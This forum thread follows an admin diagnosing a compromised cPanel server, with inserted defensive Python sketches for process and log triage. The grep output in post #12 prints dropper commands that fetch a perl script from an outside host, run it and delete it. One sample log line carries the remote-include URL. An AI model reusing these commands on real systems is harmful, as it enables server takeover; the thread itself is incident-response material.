  1. #1
    Join Date
    Mar 2005
    Posts
    533

    * Perl make High Process

    Hello

    Perl gets much process on my server.
    What should I do?

    2909 nobody 25 0 6868 3720 1248 R 95 0.2 4:11.94 perl
    1985 nobody 25 0 6812 3720 1248 R 90 0.2 4:32.36 perl
    11710 nobody 25 0 6036 3596 1128 R 87 0.2 1:41.88 perl
    10162 nobody 25 0 5832 3592 1128 R 50 0.2 1:41.39 perl
    3883 nobody 25 0 7108 3592 1128 R 49 0.2 2:49.42 perl

    Thanks

  2. #2
    Join Date
    Apr 2002
    Location
    USA
    Posts
    5,779
    cat /proc/2909/environ

    post the results.

  3. #3
    Join Date
    Mar 2005
    Posts
    533
    this is the result :-?

    ^@^@^@^@^@^@^@^@^@^@^@^@^@ $

    what is it?
    Thanks

  4. #4
    Join Date
    Apr 2002
    Location
    USA
    Posts
    5,779
    Are you running suexec? What kind of control panel are you running if any?

  5. #5
    Join Date
    Mar 2005
    Posts
    533
    Yes, I checked through cPanel and it is enabled.

    My control panel is cPanel

    Thanks

  6. #6
    Join Date
    Mar 2005
    Posts
    533
    sorry! WHM is my Control Panel

  7. #7
    Join Date
    Mar 2005
    Posts
    533
    I have checked the high process through WHM, Show Current CPU Usage

    First of all, the commands are [syslogd], and when I trace it, it shows some lines like _ and -, and this line just repeats like a loop

    select(8, [4], NULL, NULL, {0, 0}) = 0 (Timeout)
    What is wrong? :-s

    Thanks

  8. #8
    Join Date
    Apr 2002
    Location
    USA
    Posts
    5,779
    You are hacked.

    Look around in temp and /dev/shm for strange files.

    Perl should never be running as nobody if you have suexec enabled.

    Suggest you hire an admin like rack911 to take a look for you.

  9. #9
    Join Date
    Apr 2004
    Location
    India
    Posts
    211
    You can also use C in top to check and locate the path of the script that is being run on the server.

    This should help you locate the script better.

    Also you should check /tmp, /dev/shm and proxy for any strange files.

    The best way to solve this would be to hire a server admin
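
A triage sketch for the checks suggested in the replies so far (added example, not part of the thread): it walks /proc for processes owned by one UID and flags those whose displayed name differs from the real executable, as with perl showing up as [syslogd], or whose working directory is /tmp or /dev/shm. UID 99 for nobody, the httpd and crond paths and the sample process table are assumptions constructed for the demo; daemons that legitimately rewrite their title will also be flagged, so treat hits as leads.

```python
import os
from pathlib import Path

WRITABLE = ("/tmp", "/var/tmp", "/dev/shm")  # world-writable dirs to check

def _read(path):
    try:
        return Path(path).read_bytes()
    except OSError:
        return b""

def _link(path):
    try:
        return os.readlink(path)
    except OSError:  # kernel thread, or not enough privilege to read the link
        return ""

def triage(uid, proc_root="/proc"):
    """Return {pid: [reasons]} for processes of `uid` that look out of place."""
    findings = {}
    for pid in filter(str.isdigit, os.listdir(proc_root)):
        base = os.path.join(proc_root, pid)
        status = _read(base + "/status").decode(errors="replace")
        if "Uid:\t%d\t" % uid not in status:   # first field is the real UID
            continue
        exe, cwd = _link(base + "/exe"), _link(base + "/cwd")
        argv = [a for a in _read(base + "/cmdline").split(b"\0") if a]
        shown = argv[0].decode(errors="replace") if argv else ""
        reasons = []
        if exe and os.path.basename(shown) != os.path.basename(exe):
            reasons.append("shown name %r does not match exe %s" % (shown, exe))
        if any(cwd == d or cwd.startswith(d + "/") for d in WRITABLE):
            reasons.append("cwd is world-writable dir " + cwd)
        if reasons:
            findings[int(pid)] = reasons
    return findings

def build_sample_proc(root):
    """Constructed stand-in for /proc: pid -> (uid, cmdline, exe, cwd)."""
    sample = {2909: (99, b"[syslogd]\0", "/usr/bin/perl", "/tmp"),
              3001: (99, b"/usr/local/apache/bin/httpd\0", "/usr/local/apache/bin/httpd", "/"),
              4002: (0, b"/usr/sbin/crond\0", "/usr/sbin/crond", "/")}
    for pid, (uid, cmdline, exe, cwd) in sample.items():
        d = Path(root, str(pid))
        d.mkdir()
        (d / "status").write_text("Name:\tx\nUid:\t%d\t%d\t%d\t%d\n" % ((uid,) * 4))
        (d / "cmdline").write_bytes(cmdline)
        os.symlink(exe, d / "exe")   # dangling links are fine, only readlink is used
        os.symlink(cwd, d / "cwd")
```

On a live host, run `triage(99)` as root so the exe and cwd links of other users' processes are readable.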

  10. #10
    Join Date
    Mar 2005
    Posts
    533
    I checked /dev/shm and there is no file in it


    this is the /tmp content /tmp

    sess_5ec7f49ad187177e0198e7d53c53c404
    ../ sess_5f8aee3034c5583c613b017ae880444a
    16 sess_62495553a8b8dfe0ec33ec67c0ccd0ac
    21 sess_634c5a1244398fa4d16013c55eb55efe
    27 sess_64db1acbd40e26a02ede264e906f99ec
    40 sess_65f612aeed739790213a44aa81365d99
    46 sess_6789468421943d0f781ca727a40d52cb
    47 sess_6f497dcfcbde131272667de9ccb79be4
    5 sess_6f5c8a267e93f7b0eea42c796c8381b3
    7 sess_7217e4828039f3d5061485cc7bbe7c96
    9 sess_72cfa28bdef5d8f2dfa94c048c037eef
    a.1 sess_74e3111a0b719d89518ebb06b5fa8825
    a.2 sess_76f91ef4e6755fcc1799329a37169dd9
    a.3 sess_783b703a8b7485a6f7bf488d7f932307
    a.4 sess_7937af46a92210e4df02a2cda53150ee
    aquota.user* sess_7a64a686805ee32fb3da439cc9159975
    core.11710 sess_7c4a4421544a15b22bafc394bbe7f039
    cpbandwidth/ sess_7c6d1ee5d417a9cb2dca88e3665f0f20
    error_404.php sess_7da5655fb41e9b7e0c4a689e2fa20e96
    error_404.php.1 sess_7db6def6f245cbcdc01d172d8e424a27
    error_404.php.2 sess_7e3c15b7e2d5782efb147efd0642f8e3
    error_404.php.3 sess_80c43f38ded2f5be1b39b595832468fd
    horde_503.log sess_823d5fe2927159a9fdd489f1042bb923
    .ICE-unix/ sess_84e458a5ddfefa7abc9f8207c4e68322
    lost+found/ sess_864abcd3dd901188a2779d66b100b614
    mt-throttle.db sess_87c565c582c1d4a0e06e276aa109077d
    mysql.sock@ sess_89b933a8ca308cc9bdff5f947294734e
    nobody-session-0.496715847476484 sess_9157ddc8d3e8189778c108493106c0d8
    pear/ sess_936e2f7e62e583ac6957e55db02a35de
    ppp sess_975ea97e5c88d207aba4d7cdb2a1ee6f
    quota.user* sess_9db673901f3fae60a514389ffe0149d7
    .sess sess_9f8ef5f3a386b623c64a59d88c389501


    what are these sess_ ?

    Help me !

    Thanks

  11. #11
    Join Date
    Jan 2005
    Location
    Scotland, UK
    Posts
    2,549
    sess_ are the sessions of your websites, these are fine.

    You may want to check anything other than sess_ files (however they may be backdoors named as sessions)

    Check for perl in the scripts in /tmp

    grep -i "perl" /tmp/*

    View things easier

    ls -al /tmp | grep -v sess_

    For a start -> ppp

  12. #12
    Join Date
    Mar 2005
    Posts
    533
    this is the result for grep -i "perl" /tmp/*

    /tmp/lalis.txt:passthru('cd /tmp;wget http://foro-bot.webcindario.com/lali.txt;perl lali.txt;rm -f lali.txt*');
    /tmp/lalis.txt:passthru('cd /tmp;curl -O http://foro-bot.webcindario.com/lalis.txt;perl lali.txt;rm -f lali.txt*');
    /tmp/lalis.txt:passthru('cd /tmp;lwp-download http://foro-bot.webcindario.com/lali.txt;perl lali.txt;rm -f lali.txt*');
    /tmp/lalis.txt:passthru('cd /tmp;lynx -lali http://foro-bot.webcindario.com/lali.txt >nlali.txt;perl lali.txt;rm -f lali.txt*');
    /tmp/lalis.txt:passthru('cd /tmp;fetch http://foro-bot.webcindario.com/lali.txt;perl lali.txt;rm -f txt*');
    /tmp/lalis.txt:passthru('cd /tmp;GET http://foro-bot.webcindario.com/lali.txt;perl lali.txt;rm -f lali.txt*');


    How can I get to know how he has penetrated my server?
    I have just reinstalled the server and just 1 day has passed :-s

    Thanks

  13. #13
    Join Date
    Mar 2005
    Posts
    533
    It seems that even my .bash_history is not making history of any command.

    How can I enable it again?
    I want to do something not to allow anyone to clear it

    Thanks

  14. #14
    Join Date
    Apr 2002
    Location
    USA
    Posts
    5,779
    /tmp/lalis.txt:passthru('cd /tmp;wget http://foro-bot.webcindario.com/lali.txt;perl lali.txt;rm -f lali.txt*');

    That is your hack job running.

    Type

    grep lali.txt /usr/local/apache/domlogs/*.*

    and you may see the script or hole they used to upload the files to your server.

    Suggest you install mod_security if you have not already done so.
    PM me for a good rule set you can use that will stop a lot of these attacks.
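
What to look for in the domlogs, as an added example that is not part of the thread: the sketch below parses Apache combined-format lines and reports which script and query parameter received a value that mentions the dropper name or is itself a URL. The log lines, client IPs, timestamps, `/index.php` and the `page` parameter are constructed for illustration; only the `lalis.txt` URL comes from the grep output above.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache combined log format: ip ident user [time] "METHOD target PROTO" status bytes ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) ')

# Constructed sample lines (not taken from the poster's server).
SAMPLE = [
    '203.0.113.7 - - [12/Mar/2006:04:11:02 +0000] "GET /index.php?page='
    'http%3A%2F%2Fforo-bot.webcindario.com%2Flalis.txt%3F HTTP/1.1" 200 5120',
    '198.51.100.4 - - [12/Mar/2006:04:12:40 +0000] "GET /forum/viewtopic.php?t=12 HTTP/1.1" 200 20311',
    '203.0.113.7 - - [12/Mar/2006:04:13:09 +0000] "GET /images/logo.gif HTTP/1.1" 304 -',
]

def suspicious_requests(lines, needle="lali"):
    """Return (ip, time, status, script, param) for each query parameter whose
    value mentions `needle` or is a remote URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            value = unquote(value).lower()  # second decode catches double-encoding
            if needle in value or re.match(r"(https?|ftp)://", value):
                hits.append((m["ip"], m["ts"], int(m["status"]), url.path, name))
    return hits

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE):
        print(hit)
```

The script path and parameter in each hit identify the code to audit or patch, and a 200 status on such a request is the case to investigate first. Uploads sent in a POST body do not appear in the query string, so an empty result does not clear the site.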

  15. #15
    Join Date
    Mar 2005
    Posts
    533
    I executed type grep lali.txt /usr/local/apache/domlogs/ *.* and got many results as below:

    -bash: type: daccuntusername-popbytes_log.offset: not found

    what is it?

    "you may see the script or hole they used to upload the files to your server. " what should I look for?

    Thanks
